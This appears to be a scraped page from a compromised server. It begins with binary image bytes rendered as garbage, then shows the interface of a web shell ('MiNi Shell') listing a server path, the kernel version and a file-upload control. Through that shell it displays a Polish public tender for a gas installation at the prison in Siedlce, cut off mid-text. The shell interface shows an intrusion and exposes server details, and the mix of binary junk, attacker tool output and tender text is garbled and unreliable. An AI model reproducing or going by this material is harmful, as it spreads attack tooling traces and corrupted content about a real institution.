JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20241008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20241008/0053660601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Budowa instalacji gazowej na terenie Zakładu Karnego w Siedlcach&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny w Siedlcach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320472</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Józefa Piłsudskiego 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siedlce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_siedlce@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Budowa instalacji gazowej na terenie Zakładu Karnego w Siedlcach&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-51d2cf73-6584-4680-b951-c7e6c8935275</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00536606</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00236306/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa instalacji gazowej na terenie Zakładu Karnego w Siedlcach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zk_siedlce/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem strony internetowej prowadzonego postępowania.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem strony internetowej prowadzonego<br/>postępowania do konkretnego wykonawcy.<br/>Pozostałe informacje zawarte są w rozdziale 11 SWZ.<br/>https://platformazakupowa.pl/pn/zk_siedlce/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy Zakupowej określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania oferty.<br/>10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy<br/>Zakupowej, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np.<br/>złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez zamawiającego za ofertę<br/>handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art.<br/>221 Ustawy.<br/>11. Zamawiający informuje, że instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>Platformy Zakupowej znajdują się w zakładce Instrukcje dla wykonawców.<br/>Pozostałe informacje dotyczące wymagań technicznych i organizacyjnych zawarte są w rozdziale 11 i 12 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje na temat RODO zawarte są w rozdziale 22 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje na temat RODO zawarte są w rozdziale 22 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKW.2232.11.2024.JR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety społecznej</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ETAP I zadania przewidziana do realizacji od dnia podpisania umowy do 15.12.2024r:<br/>1) Zakup urządzeń gastronomicznych zasilanych gazem:<br/>a) kocioł warzelny o poj. 500L wraz z kominem odprowadzającym spaliny (parametry zgodne z dokumentacja projektową) – 3 kpl.<br/>b) kocioł warzelny o poj. 300L wraz z kominem odprowadzającym spaliny (parametry zgodne z dokumentacja projektową) – 3 kpl.<br/>c) kocioł warzelny o poj. 150L wraz z kominem odprowadzającym spaliny (parametry zgodne z dokumentacja projektową) – 2 kpl.<br/>d) patelnia gazowa o poj. 120L (parametry zgodne z dokumentacja projektową) – 2 kpl.<br/>e) kuchnia gazowa z piekarnikiem 6-palnikowa (parametry zgodne z dokumentacja projektową) – 1 kpl.<br/>f) garnek ze stali nierdzewnej 32L DN400mm – 3 kpl.<br/>g) garnek ze stali nierdzewnej 21L – 2 kpl. <br/>2) Wykonanie zadaszenia schodów do pomieszczenia kotłowni z poliwęglanu dwukomorowego na lekkiej konstrukcji z profili zimno giętych malowanych proszkowo mocowanej do ściany o wym. 6,5 m x 1,5 m<br/>3) montaż odwodnienia liniowego ze stali nierdzewnej o długości 3mb – kanał rynnowy o szer. 150 mm z odpływem, z syfonem i koszem osadniczym wraz z rusztem kratowym antypoślizgowym w pomieszczeniu zmyjki<br/><br/>ETAP II zadania przewidziana do realizacji przez okres 4 miesięcy od 01.01.2025r.<br/>4) Zewnętrzna instalacja gazowa ok. 76 mb<br/>a) Rozebranie nawierzchni z kostki brukowej betonowej na podsypce cementowo – pisakowej, wykonanie wykopu, podsypki, obsypki, odtworzenie nawierzchni z rozebranej kostki brukowej betonowej – ok. 86,25 m2<br/>b) Budowa instalacji zewnętrznej podziemnej gazu z rur PE100 SDR11 Ø160<br/>c) Montaż szafki gazowej pod zawór MAG wraz z króćcami kołnierzowymi Ø80 – 1 kpl<br/>d) Wykonanie prób szczelności,<br/>5) Wewnętrzna instalacja gazu ok 87 mb:<br/>a) Budowa instalacji wewnętrznej gazu z rur stalowych: Ø20 – 38 mb; Ø25 – 12 mb; Ø32 – 12 mb; Ø40 – 3 mb; Ø50 – 4 mb; Ø65 – 10 mb; Ø80 – 8 mb<br/>b) Wykonanie prób szczelności <br/>c) Montaż zaworu MAG Ø80 – 1 szt.<br/>d) Montaż układu sygnalizacji GAZEX zgodnie z dokumentacją techniczną lub równoważny – 1 ukł. <br/>6) Wykonanie nowej posadzki w pomieszczeniu kuchni głównej, pomieszczeniu diet oraz wydawki (należy uwzględnić skucie istniejących płytek z gresu technicznego):<br/>a) warstwy wyrównujące żywiczne o grubości 5 mm – 104,55 m2 - realizowane w pierwszej kolejności<br/>b) warstwy wyrównujące żywiczne o grubości 5 mm wraz z częściową niwelacją – 104,55 m2 – realizowane w drugiej kolejności <br/>7) Montaż w pomieszczeniach kuchni zakupionych urządzeń gastronomicznych zasilanych gazem – wykonanie ETAPOWE ze względu na czynna kuchnię:<br/>a) kocioł warzelny o poj. 500L wraz z kominem odprowadzającym spaliny (parametry zgodne z dokumentacja projektową) – 3 kpl.<br/>b) kocioł warzelny o poj. 300L wraz z kominem odprowadzającym spaliny (parametry zgodne z dokumentacja projektową) – 3 kpl.<br/>c) kocioł warzelny o poj. 150L wraz z kominem odprowadzającym spaliny (parametry zgodne z dokumentacja projektową) – 2 kpl.<br/>d) patelnia gazowa o poj. 120L (parametry zgodne z dokumentacja projektową) – 2 kpl.<br/>e) kuchnia gazowa z piekarnikiem 6-palnikowa (parametry zgodne z dokumentacja projektową) – 1 kpl.<br/>f) garnek ze stali nierdzewnej 32L DN400mm – 3 kpl.<br/>g) garnek ze stali nierdzewnej 21L – 2 kpl. <br/>7) Prace rozbiórkowe istniejącego kotła parowego zasilanego gazem:<br/>a) demontaż kotła parowego oraz instalacji ciepła technologicznego z demontażem urządzeń współpracujących (SUW, zbiornik kondensatu, komin spalinowy itp.) wraz z etapowym demontażem urządzeń gastronomicznych parowych w budynku kuchni (3 kotły warzelne 500L, 3 kotły warzelne 300L, 1 kocioł warzelny 150L, 2 zestawy kociołki przechylne typu SIM)<br/>b) naprawa posadzki w kotłowni po robotach rozbiórkowych: skucie płytek ceramicznych i wykonanie warstwy wyrównawczej pod posadzki z zaprawy cementowej zatarte na gładko – 88,75 m2 wraz z zaślepieniem wszystkich otworów odpływowych z budynku kotłowni do studni – pobliskiej przepompowni<br/>8) Roboty towarzyszące związane z wyprowadzeniem przewodów spalinowych z urządzeń gastronomicznych gazowych na połać dachową, dopasowanie połączeń istniejącej instalacji wodociągowej oraz dostosowaniem istniejącej instalacji elektrycznej do nowych urządzeń gastronomicznych gazowych<br/><br/>UWAGA: Zamawiający zaznacza, że prace związane z budową instalacji gazowej na terenie jednostki oraz w budynku kuchni będą realizowane przy ciągłej pracy kuchni, w której od godz. 5:30 do 17:30 przygotowywane są posiłki dla osadzonych w Zakładzie Karnym w Siedlcach. W związku z powyższym po stronie Wykonawcy będzie leżało wykonanie przesłon skutecznie oddzielających części remontowanych pomieszczeń od części produkcyjnej będącej w ciągłym użytkowaniu. <br/><br/>Szczegółowy zakres prac określający przedmiot zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych, stanowiące załącznik nr 10 do SWZ. Jako przedmiot zamówienia należy rozumieć wszystkie niezbędne prace, konieczne do wykonania zadania związanego z budową instalacji gazowej określone w dokumentacji projektowej stanowiące załącznik nr 10 do SWZ .<br/>Przedmiar, stanowiący załącznik nr 10 do SWZ stanowi jedynie element pomocniczy przy sporządzaniu oferty, jakiekolwiek pominięcia pozycji, niedoszacowania i braki nie mogą stanowić podstawy do zwiększenia wynagrodzenia Wykonawcy. Podstawą do wyceny prac objętych zamówieniem jest dokumentacja projektowa i STWiOR. Wykonawca, w przypadku stwierdzenia, iż przedmiar nie jest kompletny i nie zawiera wszystkich koniecznych do wykonania elementów i robót, powinien go uzupełnić zgodnie ze swoją kalkulacją, w oparciu o dokumentację projektową </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób pozbawionych wolności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają określone przez zamawiającego warunki udziału<br/>w postępowaniu.<br/>2. Zamawiający na podstawie art. 112 Ustawy informuje, że o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy<br/>spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli wykonawca:<br/>a) posiada na rachunku bankowym lub spółdzielczej kasy oszczędnościowo-kredytowej środki finansowe w wysokości co<br/>najmniej 300 000,00 zł (słownie: trzysta tysięcy złotych 00/100) lub zdolność kredytową w wysokości co najmniej 300 000,00<br/>zł (słownie: trzysta tysięcy złotych 00/100);<br/>4) zdolności technicznej lub zawodowej:<br/>a) w postępowaniu może brać udział wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 1 robotę budowlaną<br/>polegające na budowie, rozbudowie lub przebudowie instalacji gazowej o wartości nie mniejszej niż 400 000,00 zł brutto,<br/>zrealizowaną w ramach umowy, zakończonej protokołem odbioru końcowego robót bez uwag,; Wykonawca zobowiązany<br/>jest podać wartości, przedmiot, daty wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane, oraz<br/>załączyć dowody określających czy te roboty budowlane zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane. Zaleca się skorzystanie z załącznika nr 7 do SWZ.<br/>b) w postępowaniu może brać udział wykonawca, który dysponuje lub będzie dysponował co najmniej następującymi<br/>osobami, które zostaną skierowane do realizacji przedmiotowego zamówienia, o minimalnych poniższych kwalifikacjach<br/>niezbędnych do wykonania zadania:<br/>a. kierownik budowy:<br/>◦ osoba posiadająca co najmniej trzyletnie doświadczenie zawodowe w wykonywaniu samodzielnych funkcji technicznych w<br/>budownictwie, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane, w zakresie kierowania robotami budowlanymi<br/>jako kierownik budowy,<br/>◦ osoba wpisana na dzień składania ofert na listę członków właściwej izby samorządu zawodowego;<br/>◦ osobę posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń, posiadającą aktualne członkostwo we właściwej izbie samorządu zawodowego, która to<br/>osoba obejmie pełnienie obowiązków Kierownika Budowy dla realizacji zadania.<br/>Zaleca się skorzystanie z załącznika nr 8 do SWZ<br/>Uwaga:<br/>Wskazane powyżej uprawnienia budowlane muszą być zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. ( Dz. U. 2023 r. poz. 682, ze zm.) i rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w<br/>sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r.,<br/>poz. 831) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/>UWAGA 1: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ww. warunek mogą spełniać łącznie.<br/>UWAGA 2: Zamawiający, określając wymogi w zakresie posiadania uprawnień budowlanych (w tym przynależności do<br/>określonego samorządu zawodowego) na podstawie (art. 12a) ustawy z dnia 7 lipca 1994 r. - Prawo 